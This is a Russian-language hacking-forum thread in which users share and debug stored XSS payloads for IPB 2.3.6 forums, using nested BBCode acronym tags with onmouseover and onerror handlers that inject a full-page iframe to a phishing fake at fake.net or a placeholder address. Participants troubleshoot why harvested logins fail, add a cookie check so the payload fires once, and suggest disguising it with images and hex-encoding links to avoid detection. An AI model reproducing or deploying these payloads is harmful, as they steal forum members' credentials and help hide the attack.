Взлом БД через форум с xss

[necros555]

Цитата: Сообщение от Восстание Здравствуйте. Решил попробовать сделать XSS Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу. Подскажите пожалуйста что я неправильно делаю, вот код: x3Cifr*ame естественно без * Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные пользователи. ]

то что это для ipb а не для булки вот че ты неправильно делаеш

[wagan]

А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.

оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)

[BlackWinG]

Цитата: Сообщение от wagan А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю. оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)

Да, если в подписи ты видиш свой код, значит там точно не получиться....

Сказано ведь, забудь, там работать не будет просто, только палишся...

[IncubusX]

Его сообщении в мазиле переадресовывает только при наведении.

[Восстание]

Переадресовывает но валиво. Закрась это в белый цвет)

По моему на "булках" тоже как то можно так делать, только я непомню код, но он там простой.

[wagan]

Код:

[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym]

Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.

[fesssi]

Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.

[F4ll3nL0rD]

Цитата: Сообщение от wagan Код: [acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym] Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.

Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные пользователи. ]

То поправь на
[Ссылки могут видеть только зарегистрированные пользователи. ]
И все должно получиться.

[wagan]

Цитата: Сообщение от fesssi Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме. Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен. Думаю проблема в этом.

Был залогинен.

Цитата: Сообщение от F4ll3nL0rD Ты в скрипте посмотри куда стоит редирект. Если так: [Ссылки могут видеть только зарегистрированные пользователи. ] То поправь на [Ссылки могут видеть только зарегистрированные пользователи. ] И все должно получиться.

Точно))

[Libert]

Ребят, вот что вылетает вместо переадресации

Цитата: <****** src=http://адресфейка/ frameborder=0 width=100% height=100% scrolling=no>

IPB 2.3.6 тег работает, фейк работает, с переадресацией ****ь какая-то=(

Кстати на IPB 3 не пашет, пробывал на трех форумах

Добавлено через 6 минут
ах да, вот сам текст:

Цитата: [acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=http://адресфейка/\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]Здесь могла быть ваша реклама[/acronym]_[/acronym]

Потом пробывал и это:

Цитата: [acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=http://адресфейка/\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

После каждой попытки чистил куки и всё-равно не переадресовывает
IE 8 не сработал
Opera 10.60

Цитата: <****** src=http://адресфейка/ frameborder=0 width=100% height=100% scrolling=no>

Firefox 4.01 и 3.6 то-же что и с оперой, если кто сталкивался, обьясните что не так

Добавлено через 7 часов 4 минуты
сорри, не посмотрел первое сообщение до конца, заменил звёздочки-пашет, автору плюс огромный, если кто сможет подкинуть код для булки(vbulletin) буду оч благодарен.
Хочу добавить, что лучше всего вместо текста ставить картинку вроде [img*]http://img143.imageshack.us/img143/3750/dig.gif[/img*] (без звёздочек)
После лучше шифрануть ссылки в 16-тиричный вид можно в вебе на ха.кер.орг а можно самому [Ссылки могут видеть только зарегистрированные пользователи. ] тут есть исходник html для такого энкодера